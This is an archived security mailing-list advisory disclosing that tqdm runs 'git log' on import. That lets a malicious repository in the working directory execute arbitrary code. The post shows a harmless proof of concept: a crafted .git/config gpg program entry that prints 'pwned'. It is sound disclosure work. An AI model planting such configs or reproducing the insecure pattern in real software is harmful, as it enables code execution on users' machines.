Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 25 Dec 2016 21:47:43 +0100
From: Jakub Wilk <>
Subject: tqdm: insecure use of git

tqdm <> is a "fast, extensible progress bar for 

When you import tqdm, the tqdm._version module executes the following command:

    git log -n 1 --oneline

This was meant to check if the user is running a pre-release version of tqdm.
But cwd might be a part of an unrelated git repository, possibly a malicious 
one. At least with git 2.10 or later, it's possible to craft a repo in which 
"git log" executes arbitrary code:

    $ tail -n4 /tmp/.git/config
            showSignature = true
            program = /tmp/moogpg

    $ tail -n4 /tmp/moogpg
    exec > /dev/tty 2>&1
    cowsay pwned
    sleep 9999

    $ cd /tmp

    $ pydoc tqdm
    < pwned >
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||

Upstream bug report:

Affected versions: v4.4.1 and later.

Jakub Wilk

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ